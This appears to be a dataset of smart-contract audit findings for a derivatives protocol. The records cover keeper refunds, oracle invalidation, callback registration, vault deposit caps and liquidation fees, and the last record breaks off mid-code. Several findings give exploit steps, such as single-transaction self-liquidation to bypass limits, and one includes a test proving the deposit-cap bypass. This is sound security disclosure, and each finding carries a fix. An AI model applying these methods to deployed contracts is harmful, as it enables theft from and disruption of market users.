```\\nfunction settle(bytes32[] memory ids, IMarket[] memory markets, uint256[] memory versions, uint256[] memory maxCounts)\\n external\\n keep(settleKeepConfig(), msg.data, 0, "")\\n{\\n if (\\n ids.length != markets.length ||\\n ids.length != versions.length ||\\n ids.length != maxCounts.length ||\\n // Prevent calldata stuffing\\n abi.encodeCall(KeeperFactory.settle, (ids, markets, versions, maxCounts)).length != msg.data.length\\n )\\n revert KeeperFactoryInvalidSettleError();\\n\\n for (uint256 i; i < ids.length; i++)\\n IKeeperOracle(address(oracles[ids[i]])).settle(markets[i], versions[i], maxCounts[i]);\\n}\\n```\\n
MultiInvoker doesn't pay keepers a refund for L1 calldata
medium
MultiInvoker doesn't pay keepers a refund for L1 calldata; as a result, keepers may not be incentivized to execute orders.\\nThe MultiInvoker contract allows users to create orders, which can then be executed by keepers. For this job, the keeper receives a fee from the order's creator. This fee payment is handled by the `_handleKeep` function.\\nThe function calls the `keep` modifier and crafts a `KeepConfig` which contains `keepBufferCalldata`, a flat fee for the L1 calldata of this call.\\n```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n\\nThis modifier calculates the amount of tokens that should be refunded to the keeper and then raises it. We are interested not in the whole modifier, but in the calldata handling, which is done via the `_calldataFee` function. This function does nothing in the `Kept` contract and is overridden in `Kept_Arbitrum` and `Kept_Optimism`.\\nThe problem is that there is only one MultiInvoker, and it just extends `Kept`. As a result, its `_calldataFee` function will always return 0, which means that the calldata fee will not be added to the keeper's refund.
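A simplified model of the `keep` fee computation (Python; the real contract uses UFixed18 fixed-point math) shows the missing calldata component:

```python
def keeper_fee(applicable_value, base_fee, calldata_fee, ether_price):
    """keeperFee = (applicableValue + baseFee + calldataFee) * etherPrice,
    mirroring the keep modifier's final computation."""
    return (applicable_value + base_fee + calldata_fee) * ether_price

# On the base Kept contract, _calldataFee(...) always returns 0, so however
# large the L1 calldata cost actually was, it never enters the refund.
assert keeper_fee(0, 100.0, 0.0, 2.0) == 200.0
# With a Kept_Arbitrum/Kept_Optimism override the calldata fee would be added:
assert keeper_fee(0, 100.0, 30.0, 2.0) == 260.0
```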
Implement two versions of MultiInvoker: one for Optimism (extending `Kept_Optimism`) and one for Arbitrum (extending `Kept_Arbitrum`).
Keepers will not be incentivized to execute orders.
```\\n modifier keep(\\n KeepConfig memory config,\\n bytes calldata applicableCalldata,\\n uint256 applicableValue,\\n bytes memory data\\n ) {\\n uint256 startGas = gasleft();\\n\\n\\n _;\\n\\n\\n uint256 applicableGas = startGas - gasleft();\\n (UFixed18 baseFee, UFixed18 calldataFee) = (\\n _baseFee(applicableGas, config.multiplierBase, config.bufferBase),\\n _calldataFee(applicableCalldata, config.multiplierCalldata, config.bufferCalldata)\\n );\\n\\n\\n UFixed18 keeperFee = UFixed18.wrap(applicableValue).add(baseFee).add(calldataFee).mul(_etherPrice());\\n _raiseKeeperFee(keeperFee, data);\\n keeperToken().push(msg.sender, keeperFee);\\n\\n\\n emit KeeperCall(msg.sender, applicableGas, applicableValue, baseFee, calldataFee, keeperFee);\\n }\\n```\\n
It is possible to open and liquidate your own position in 1 transaction to overcome efficiency and liquidity removal limits at almost no cost
medium
In 2.0 audit the issue 104 was fixed but not fully and it's still possible, in a slightly different way. This wasn't found in the fix review contest. The fix introduced margined and maintained amounts, so that margined amount is higher than maintained one. However, when collateral is withdrawn, only the current (pending) position is checked by margined amount, the largest position (including latest settled) is checked by maintained amount. This still allows to withdraw funds up to the edge of being liquidated, if margined current position amount <= maintained settled position amount. So the new way to liquidate your own position is to reduce your position and then do the same as in 2.0 issue.\\nThis means that it's possible to be at almost liquidation level intentionally and moreover, the current oracle setup allows to open and immediately liquidate your own position in 1 transaction, effectively bypassing efficiency and liquidity removal limits, paying only the keeper (and possible position open/close) fees, causing all kinds of malicious activity which can harm the protocol.\\n`Market._invariant` verifies margined amount only for the current position:\\n```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n\\nAll the other checks (max pending position, including settled amount) are for maintained amount:\\n```\\nif (\\n !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThe user can liquidate his own position with 100% guarantee in 1 transaction by following these steps:\\nIt can be done only on existing settled position\\nRecord Pyth oracle prices with signatures until you encounter a price which is higher (or lower, depending on your position direction) than latest oracle version price by any amount.\\nIn 
1 transaction do the following: 3.1. Reduce your position by the factor `(margin / maintenance)` to bring the position you want to liquidate exactly to the edge of liquidation, then withdraw the maximum allowed collateral. The position reduction makes margined(current position) = maintained(settled position), so it is possible to withdraw right up to the liquidation edge. 3.2. Commit a non-requested oracle version with the price recorded earlier (this price makes the position liquidatable). 3.3. Liquidate your position (this is allowed because the position incurs a minimal loss from the price change and becomes liquidatable).\\nSince the entire liquidation fee is given to the user himself, liquidating one's own position is almost free for the user (only the keeper fee and any position open/close fees are paid).
If collateral is withdrawn or an order increases the position, verify `maxPendingMagnitude` against the `margined` amount. Only if the position is reduced or remains unchanged AND no collateral is withdrawn may `maxPendingMagnitude` be verified against the `maintained` amount.
Different malicious scenarios can abuse this issue to overcome the efficiency and liquidity removal limitations (as they're ignored when liquidating positions), such as:\\nCombine it with the other issues for a more severe effect, abusing them in 1 transaction (for example, make `closable = 0` and liquidate your position while increasing it to the max position size of 2^62-1 - all in 1 transaction)\\nOpen a large maker and a long or short position, then liquidate the maker to cause a mismatch between long/short and maker (socialized positions). This will cause chaos in the market and an imbalance between long and short profit/loss; users will probably start leaving such a chaotic market, so while this attack is not totally free, it's cheap enough to drive users away from a competitor.\\nOpen a large maker position, wait for long and/or short positions from normal users to accumulate, then liquidate most of the large maker position, which will drive taker interest very high; the remaining small maker position will then accumulate a big profit with small risk.
```\\nif (\\n !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n) revert MarketInsufficientMarginError();\\n```\\n
Invalid oracle version can cause the `maker` position to exceed `makerLimit`, temporarily or permanently bricking the Market contract
medium
When an invalid oracle version happens, positions pending at that oracle version are invalidated, with the following pending positions increasing or decreasing in size accordingly. When this happens, the position limit checks are not applied to the adjusted positions (and they can't be cancelled/modified), but they are still verified for the final positions in `_invariant`. This means that many checks are bypassed during such an event. There is protection against underflow from this problem, enforcing that the calculated `closable` value is 0 or higher. However, exactly the same problem can happen with overflow, and there is no protection against it.\\nFor example:\\nLatest global maker = maker limit = 1000\\nPending global maker = 500 [t=100]\\nPending global maker = 1000 [t=200]\\nIf the oracle version at t = 100 is invalid, then the pending global maker = 1500 (at t = 200). However, due to this check in `_invariant`:\\n```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n\\nall Market updates will revert except an update reducing the maker position by 500+, which might not even be possible in 1 update depending on the maker distribution between users. For example, if 5 users each have maker = 300 (1500 total), then no single user can reduce maker by 500. This will temporarily brick the Market (all updates will revert) until the coordinator increases the maker limit. If the limit is already close to the max possible (2^62-1), then the contract will be bricked permanently (all updates will revert regardless of the maker limit, because the global maker will exceed 2^62-1 in calculations and revert when stored).\\nThe same issue can also cause other problems, such as:\\nBypassing the market utilization limit if long/short is increased above maker\\nA user unexpectedly becoming liquidatable with too high a position (for example: position 500 -> pending 0 -> pending 500 will make current = 1000 if the middle oracle version is invalid)
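The invalidation arithmetic in the example above can be simulated with a short sketch (a hypothetical Python model of the described adjustment behavior, not the actual contract code):

```python
def settle(latest, pendings):
    """Settle pending positions against oracle versions.

    pendings: list of (intended_absolute_position, oracle_valid) tuples,
    ordered oldest -> newest. When a version is invalid, the position does
    not take effect and the skipped delta is pushed onto later pendings.
    """
    position = latest
    adjustment = 0  # carried delta from invalidated oracle versions
    for intended, valid in pendings:
        intended += adjustment
        if valid:
            position = intended
        else:
            # position stays where it was; remember the delta we skipped
            adjustment += position - intended
    return position

# Example from the description: maker limit = 1000.
# t=100 (maker -> 500) is invalidated, t=200 (maker -> 1000) settles at 1500.
print(settle(1000, [(500, False), (1000, True)]))  # -> 1500, above the limit
```

With both versions valid the final maker is 1000 as intended; the single invalid version is what pushes it to 1500, past the check shown above.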
The same issue for underflow is already resolved by using `closable` and enforcing such pending positions that no invalid oracle version can push the position below 0. This issue can be resolved in the same way, by introducing an `openable` value (calculated similarly to `closable`, but in reverse - it increases when the position is increased and doesn't change when the position is decreased) and enforcing different limits, such that settled position + openable:\\ncan not exceed the max maker\\ncan not break utilization\\nfor the local position - calculate the maxMagnitude amount from `settled + local openable` instead of absolute pending position values for the margined/maintained calculations.
If the current maker is close to the maker limit, some user(s) reduce their maker and then immediately increase it back, and the oracle version is invalid, the maker will be above the maker limit and the Market will be temporarily bricked until the coordinator increases the maker limit. Even though it's temporary, it is still bricked for some time, and the coordinator is forced to increase the maker limit, breaking the intended market config. Furthermore, once the maker limit is increased, there is no guarantee that the users will reduce it so that the limit can be lowered again.\\nAlso, for some low-price tokens, the maker limit can be close to the max possible value (2^62-1 is about `4*1e18`, or Fixed6(4*1e12)). If the token price is about $0.00001, such a maker limit allows `$4*1e7`, i.e. $40M. So, if a low-value token with a $40M maker limit is used, this issue will make the maker overflow 2^62-1 and brick the Market permanently, with all users unable to withdraw their funds, losing everything.\\nWhile this situation is not very likely, it's well possible. For example, if the maker is close to the limit, any maker reducing its position will have some other user immediately take up the freed maker space, so global maker changes like 1000->900->1000 are easily possible, and any invalid oracle version will then likely push the maker over the limit.
```\\nif (context.currentPosition.global.maker.gt(context.riskParameter.makerLimit))\\n revert MarketMakerOverLimitError();\\n```\\n
`KeeperOracle.request` adds only the first pair of market+account addresses per oracle version to callback list, ignoring all the subsequent ones
medium
The new feature introduced in 2.1 is the callback called for all markets and market+account pairs which requested the oracle version. These callbacks are called once the corresponding oracle settles. For this reason, `KeeperOracle` keeps a list of markets and market+account pairs per oracle version to call market.update on them:\\n```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n\\nHowever, currently `KeeperOracle` stores only the market+account from the first request call per oracle version, because if the request was already made, it returns from the function before adding to the list:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n@@@ if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n\\n // @audit only the first request per version reaches these lines to add market+account to callback list\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n}\\n```\\n\\nAccording to docs, the same `KeeperOracle` can be used by multiple markets. And every account requesting in the same oracle version is supposed to be called back (settled) once the oracle version settles.
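The early-return behavior can be demonstrated with a toy model (a hypothetical Python sketch mirroring the control flow shown above, not the real contract):

```python
class KeeperOracleBuggy:
    """Toy model of KeeperOracle.request with the early return shown above."""

    def __init__(self):
        self.version_requested = None
        self.local_callbacks = []  # (market, account) pairs for this version

    def request(self, current_timestamp, market, account):
        if self.version_requested == current_timestamp:
            return  # early return: callback registration below is skipped
        self.version_requested = current_timestamp
        self.local_callbacks.append((market, account))

oracle = KeeperOracleBuggy()
oracle.request(100, "marketA", "alice")
oracle.request(100, "marketA", "bob")    # silently dropped
oracle.request(100, "marketB", "carol")  # silently dropped
print(oracle.local_callbacks)  # [('marketA', 'alice')] - only the first pair
```

Every account after the first is never added to the callback list, so their settlement callbacks are never fired for that oracle version.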
Move addition to callback list to just before the condition to exit function early:\\n```\\nfunction request(IMarket market, address account) external onlyAuthorized {\\n uint256 currentTimestamp = current();\\n _globalCallbacks[currentTimestamp].add(address(market));\\n _localCallbacks[currentTimestamp][market].add(account);\\n emit CallbackRequested(SettlementCallback(market, account, currentTimestamp));\\n if (versions[_global.currentIndex] == currentTimestamp) return;\\n\\n versions[++_global.currentIndex] = currentTimestamp;\\n emit OracleProviderVersionRequested(currentTimestamp);\\n}\\n```\\n
The new core function of the protocol doesn't work as expected and `KeeperOracle` will fail to call back markets and accounts if there is more than 1 request in the same oracle version (which is very likely).
```\\n/// @dev Mapping from version to a set of registered markets for settlement callback\\nmapping(uint256 => EnumerableSet.AddressSet) private _globalCallbacks;\\n\\n/// @dev Mapping from version and market to a set of registered accounts for settlement callback\\nmapping(uint256 => mapping(IMarket => EnumerableSet.AddressSet)) private _localCallbacks;\\n```\\n
`KeeperOracle.commit` will revert and won't work for all markets if any single `Market` is paused.
medium
According to the protocol design (from the KeeperOracle comments), multiple markets may use the same KeeperOracle instance:\\n```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n\\nHowever, if `KeeperOracle` is used by several `Market` instances, and one of them makes a request and is then paused before the settlement, `KeeperOracle` will be temporarily bricked until the `Market` is unpaused. This happens because `KeeperOracle.commit` will revert in the market callback: `commit` iterates through all requested markets and calls `update` on each of them, and `update` reverts if the market is paused.\\nThis means that pausing just 1 market will effectively stop trading in all the other markets which use the same `KeeperOracle`, disrupting protocol usage. When `KeeperOracle.commit` always reverts, it's also impossible to switch the oracle provider from the upstream `OracleFactory`, because a provider switch still requires the latest version of the previous oracle to be committed, and it will be impossible to commit it (whether valid or invalid, requested or unrequested).\\nAdditionally, the market's `update` can also revert for other reasons, for example if the maker exceeds the maker limit after an invalid oracle version, as described in the other issue.\\nAnd as another problem (lower severity, but caused by the same lines): if too many markets are authorized to call `KeeperOracle.request`, the market callbacks' gas usage might exceed the block gas limit, making it impossible to call `commit` due to insufficient gas.
Currently there is no limit on the number of Markets that can be added to the callback queue.\\n`KeeperOracle.commit` calls back `update` on all markets which called `request` in the oracle version:\\n```\\nfor (uint256 i; i < _globalCallbacks[version.timestamp].length(); i++)\\n _settle(IMarket(_globalCallbacks[version.timestamp].at(i)), address(0));\\n// rest of code\\nfunction _settle(IMarket market, address account) private {\\n market.update(account, UFixed6Lib.MAX, UFixed6Lib.MAX, UFixed6Lib.MAX, Fixed6Lib.ZERO, false);\\n}\\n```\\n\\nIf any `Market` is paused, its `update` function will revert (notice the `whenNotPaused` modifier):\\n```\\n function update(\\n address account,\\n UFixed6 newMaker,\\n UFixed6 newLong,\\n UFixed6 newShort,\\n Fixed6 collateral,\\n bool protect\\n ) external nonReentrant whenNotPaused {\\n```\\n\\nThis means that if any `Market` is paused, all the other markets will be unable to continue trading, since `commit` in their oracle provider will revert. It will also be impossible to successfully switch to a new provider for these markets, because the previous oracle provider must still `commit` its latest request before fully switching to a new oracle provider:\\n```\\nfunction _latestStale(OracleVersion memory currentOracleLatestVersion) private view returns (bool) {\\n if (global.current == global.latest) return false;\\n if (global.latest == 0) return true;\\n\\n@@@ if (uint256(oracles[global.latest].timestamp) > oracles[global.latest].provider.latest().timestamp) return false;\\n if (uint256(oracles[global.latest].timestamp) >= currentOracleLatestVersion.timestamp) return false;\\n\\n return true;\\n}\\n```\\n
Consider catching and ignoring the revert when calling `update` on a market in `_settle` (wrap it in try .. catch).\\nConsider also adding a limit on the number of markets added to the callback queue in each oracle version, or alternatively limiting the number of markets authorized to call `request`.
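The try .. catch mitigation pattern can be sketched like this (an illustrative Python analogue; the names `PausedMarketError`, `settle_all`, and the stand-in market functions are hypothetical):

```python
class PausedMarketError(Exception):
    """Stand-in for a Market.update revert caused by whenNotPaused."""

def settle_all(markets):
    """Settle every market, skipping (not propagating) paused-market errors."""
    settled = []
    for market in markets:
        try:
            market()  # stand-in for market.update(...)
            settled.append(market.__name__)
        except PausedMarketError:
            pass  # a single paused market must not block the whole commit
    return settled

def market_a(): pass
def market_b(): raise PausedMarketError()  # this market is paused
def market_c(): pass

print(settle_all([market_a, market_b, market_c]))  # ['market_a', 'market_c']
```

The key design point is that the commit loop degrades gracefully: healthy markets still receive their callbacks even while one market is paused.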
One paused market will stop trading in all the markets which use the same oracle provider (KeeperOracle).
```\\n/// @dev One instance per price feed should be deployed. Multiple products may use the same\\n/// KeeperOracle instance if their payoff functions are based on the same underlying oracle.\\n/// This implementation only supports non-negative prices.\\n```\\n
Vault `_maxDeposit` incorrect calculation allows to bypass vault deposit cap
medium
Vault has a deposit cap risk setting, which is the max amount of funds users can deposit into the vault. The problem is that the `_maxDeposit` function, which calculates the max amount of assets allowed to be deposited, is incorrect and always includes the vault's claimable assets, even when the vault is at the cap. This allows a malicious (or even a regular) user to deposit an unlimited amount, bypassing the vault cap, if the vault has any assets redeemed but not claimed yet. This breaks the core protocol function which limits users' risk, for example when the vault is still in the testing phase and the owner wants to limit potential losses in case of any problems.\\n`Vault._update` limits the user deposit to the `_maxDeposit()` amount:\\n```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n\\nWhen calculating the max deposit, the vault's collateral consists of vault assets as well as assets which are redeemed but not yet claimed. However, the formula used to calculate the max deposit is incorrect; it is:\\n`maxDeposit = claimableAssets + (cap - min(collateral, cap))`\\nAs can be seen from the formula, regardless of the cap and current collateral, maxDeposit will always be at least claimableAssets, even when the vault is already at or above the cap, which is clearly wrong.
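The flaw is easy to check numerically (a minimal Python sketch of the formula above, assuming plain numbers for cap, collateral and claimable assets):

```python
def max_deposit_incorrect(cap, collateral, claimable):
    # current formula: claimableAssets + (cap - min(collateral, cap))
    return claimable + (cap - min(collateral, cap))

# Vault exactly at the cap (collateral == cap == 100) with 50 claimable assets:
print(max_deposit_incorrect(100, 100, 50))  # -> 50: deposits still allowed

# Same vault with nothing claimable behaves as expected:
print(max_deposit_incorrect(100, 100, 0))   # -> 0: cap correctly enforced
```

Whenever `claimable > 0`, the result stays positive even at or above the cap, which is exactly the bypass described above.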
The correct formula should subtract claimableAssets from collateral (or 0 if claimableAssets is higher than collateral) instead of adding it to the result:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nCurrent incorrect formula allows to deposit up to claimable assets amount even when the vault is at or above cap. This can either be used by malicious user (user can deposit up to cap, redeem, deposit amount = up to cap + claimable, redeem, ..., repeat until target deposit amount is reached) or can happen itself when there are claimable assets available and vault is at the cap (which can easily happen by itself if some user forgets to claim or it takes long time to claim).\\nBypass of vault cap is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('bypass vault deposit cap', async () => {\\n console.log("start");\\n\\n await vault.connect(owner).updateParameter({\\n cap: parse6decimal('100'),\\n });\\n\\n await updateOracle()\\n\\n var deposit = parse6decimal('100')\\n console.log("Deposit 100")\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n // additional deposit reverts due to cap\\n var deposit = parse6decimal('10')\\n console.log("Deposit 10 revert")\\n await expect(vault.connect(user).update(user.address, deposit, 0, 0)).to.be.reverted;\\n\\n // now redeem 50\\n var redeem = parse6decimal('50')\\n console.log("Redeem 50")\\n await vault.connect(user).update(user.address, 0, redeem, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n // deposit 100 (50+100=150) doesn't revert, because assets = 50\\n var deposit = parse6decimal('100')\\n console.log("Deposit 100")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n 
await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n\\n var deposit = parse6decimal('50')\\n console.log("Deposit 50")\\n await vault.connect(user).update(user.address, deposit, 0, 0);\\n\\n await updateOracle()\\n await vault.settle(user.address);\\n\\n var assets = await vault.totalAssets();\\n console.log("Vault assets: " + assets);\\n})\\n```\\n\\nConsole log from execution of the code above:\\n```\\nstart\\nDeposit 100\\nVault assets: 100000000\\nDeposit 10 revert\\nRedeem 50\\nVault assets: 50000000\\nDeposit 100\\nVault assets: 150000000\\nDeposit 50\\nVault assets: 200000000\\n```\\n\\nThe vault cap is set to 100 and is then demonstrated that it is bypassed and vault assets are set at 200 (and can be continued indefinitely)
The correct formula to `_maxDeposit` should be:\\n`maxDeposit = cap - min(collateral - min(collateral, claimableAssets), cap)`\\nSo the code can be:\\n```\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.parameter.cap.sub(collateral.sub(context.global.assets.min(collateral)).min(context.parameter.cap));\\n}\\n```\\n
Malicious and regular users can bypass the vault deposit cap, either intentionally or simply in normal operation when some users redeem and claimable assets are available in the vault. This breaks the core contract security function of limiting the deposit amount and can potentially lead to large user fund losses - for example at the initial stages, when the owner is still testing the oracle provider/market/etc. and wants to limit vault deposits in case anything goes wrong, but gets unlimited deposits instead.
```\\n if (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// rest of code\\nfunction _maxDeposit(Context memory context) private view returns (UFixed6) {\\n if (context.latestCheckpoint.unhealthy()) return UFixed6Lib.ZERO;\\n UFixed6 collateral = UFixed6Lib.from(totalAssets().max(Fixed6Lib.ZERO)).add(context.global.deposit);\\n return context.global.assets.add(context.parameter.cap.sub(collateral.min(context.parameter.cap)));\\n}\\n```\\n
Pending keeper and position fees are not accounted for in vault collateral calculation which can be abused to liquidate vault when it's small
medium
Vault opens positions in the underlying markets, trying to keep the leverage at the level set for each market by the owner. However, it uses the sum of market collaterals, which excludes keeper and position fees - while pending fees are included in account health calculations in the `Market` itself.\\nWhen the vault TVL is high, this difference is mostly unnoticeable. However, if the vault is small and the keeper fee is high enough, it's possible to intentionally add keeper fees by depositing minimal amounts from different accounts in the same oracle version. This keeps/increases the vault's calculated collateral, but its pending collateral in the underlying markets shrinks due to fees, which increases the actual vault leverage - so it's possible to push the vault leverage up to the maximum possible and even intentionally liquidate the vault.\\nEven when the vault TVL is not low but the keeper fee is large enough, the other reported issue allows setting the vault leverage to the max (according to the margined amount), and then this issue allows reducing the vault collateral even further, down to the maintained amount, after which committing a slightly worse price liquidates the vault.\\nWhen the vault leverage is calculated, it uses collateral equal to the sum of the collaterals of all markets, loaded as follows:\\n```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n\\nHowever, the market's `local.collateral` excludes pending keeper and position fees.
But pending fees are included in account health calculations in the `Market` itself (when loading pending positions):\\n```\\n context.pendingCollateral = context.pendingCollateral\\n .sub(newPendingPosition.fee)\\n .sub(Fixed6Lib.from(newPendingPosition.keeper));\\n// rest of code\\n if (protected && (\\n !context.closable.isZero() || // @audit-issue even if closable is 0, position can still increase\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n@@@ context.pendingCollateral.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n )) revert MarketInvalidProtectionError();\\n// rest of code\\n if (\\n@@@ !context.currentPosition.local.margined(context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMarginError();\\n\\n if (\\n@@@ !PositionLib.maintained(context.maxPendingMagnitude, context.latestVersion, context.riskParameter, context.pendingCollateral)\\n ) revert MarketInsufficientMaintenanceError();\\n```\\n\\nThis means that small vault deposits from different accounts will be used for fees, but these fees will not be counted in vault underlying markets leverage calculations, allowing to increase vault's actual leverage.
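The leverage drift can be illustrated with assumed toy numbers (not taken from the protocol):

```python
# The vault sizes its position off collateral that excludes pending keeper
# fees, while the Market subtracts them when checking account health.

vault_collateral = 100.0       # local.collateral as read by the vault
pending_keeper_fees = 20.0     # accumulated from many tiny deposits
market_collateral = vault_collateral - pending_keeper_fees

target_leverage = 5.0
position_notional = vault_collateral * target_leverage  # sized off 100, not 80

actual_leverage = position_notional / market_collateral
print(actual_leverage)  # 6.25 - well above the configured 5.0
```

The gap grows with every small deposit that adds a keeper fee, which is why the attack works best against a small vault with a high keeper fee.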
Consider subtracting pending fees when loading underlying markets data context in the vault.
When vault TVL is small and keeper fees are high enough, it's possible to intentionally increase actual vault leverage and liquidate the vault by creating many small deposits from different user accounts, making the vault users lose their funds.
```\\n// local\\nLocal memory local = registration.market.locals(address(this));\\ncontext.latestIds.update(marketId, local.latestId);\\ncontext.currentIds.update(marketId, local.currentId);\\ncontext.collaterals[marketId] = local.collateral;\\n```\\n
`MultiInvoker._latest` will return `latestPrice = 0` when latest oracle version is invalid causing liquidation to send 0 fee to liquidator or incorrect order execution
medium
There was a slight change in oracle version handling in 2.1: now each requested oracle version must be committed, either as valid or invalid. This means that the latest version can now be invalid (price = 0). This is handled correctly in `Market`, which only uses the timestamp from the latest oracle version, while the price comes either from the latest version (if valid) or from `global.latestPrice` (if invalid).\\nHowever, `MultiInvoker` always uses the price from `oracle.latest` without verifying its validity, meaning it will return `latestPrice = 0` if the latest oracle version is invalid. This is returned from the `_latest` function.\\nSuch latestPrice = 0 leads to 2 main problems:\\nLiquidation orders in MultiInvoker will send 0 liquidation fee to the liquidator (liquidation for free)\\nSome TriggerOrders will trigger incorrectly (canExecuteOrder will return true when the real price hasn't reached the trigger price, or false even if the real price has reached the trigger price)\\n`MultiInvoker._latest` has the following code for the latest price assignment:\\n```\\nOracleVersion memory latestOracleVersion = market.oracle().latest();\\nlatestPrice = latestOracleVersion.price;\\nIPayoffProvider payoff = market.payoff();\\nif (address(payoff) != address(0)) latestPrice = payoff.payoff(latestPrice);\\n```\\n\\nThis `latestPrice` is what's returned from `_latest`; it isn't changed anywhere else. Notice that there is no check of the latest oracle version's validity.\\nAnd this is the code for KeeperOracle._commitRequested:\\n```\\nfunction _commitRequested(OracleVersion memory version) private returns (bool) {\\n if (block.timestamp <= (next() + timeout)) {\\n if (!version.valid) revert KeeperOracleInvalidPriceError();\\n _prices[version.timestamp] = version.price;\\n }\\n _global.latestIndex++;\\n return true;\\n}\\n```\\n\\nNotice that commits made outside the timeout window simply increase `_global.latestIndex` without assigning `_prices`, meaning the price remains 0 (invalid). 
This means that latest oracle version will return price=0 and will be invalid if commited after the timeout from request time has passed.\\nPrice returned by `_latest` is used when calculating liquidationFee:\\n```\\nfunction _liquidationFee(IMarket market, address account) internal view returns (Position memory, UFixed6, UFixed6) {\\n // load information about liquidation\\n RiskParameter memory riskParameter = market.riskParameter();\\n@@@ (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) = _latest(market, account);\\n\\n // create placeholder order for liquidation fee calculation (fee is charged the same on all sides)\\n Order memory placeholderOrder;\\n placeholderOrder.maker = Fixed6Lib.from(closableAmount);\\n\\n return (\\n latestPosition,\\n placeholderOrder\\n@@@ .liquidationFee(OracleVersion(latestPosition.timestamp, latestPrice, true), riskParameter)\\n .min(UFixed6Lib.from(market.token().balanceOf(address(market)))),\\n closableAmount\\n );\\n}\\n```\\n\\n`liquidationFee` calculation in order multiplies order size by `latestPrice`, meaning it will be 0 when price = 0. This liquidation fee is then used in `market.update` for liquidation fee to receive by liquidator:\\n```\\n function _liquidate(IMarket market, address account, bool revertOnFailure) internal isMarketInstance(market) {\\n@@@ (Position memory latestPosition, UFixed6 liquidationFee, UFixed6 closable) = _liquidationFee(market, account);\\n Position memory currentPosition = market.pendingPositions(account, market.locals(account).currentId);\\n currentPosition.adjust(latestPosition);\\n\\n try market.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? 
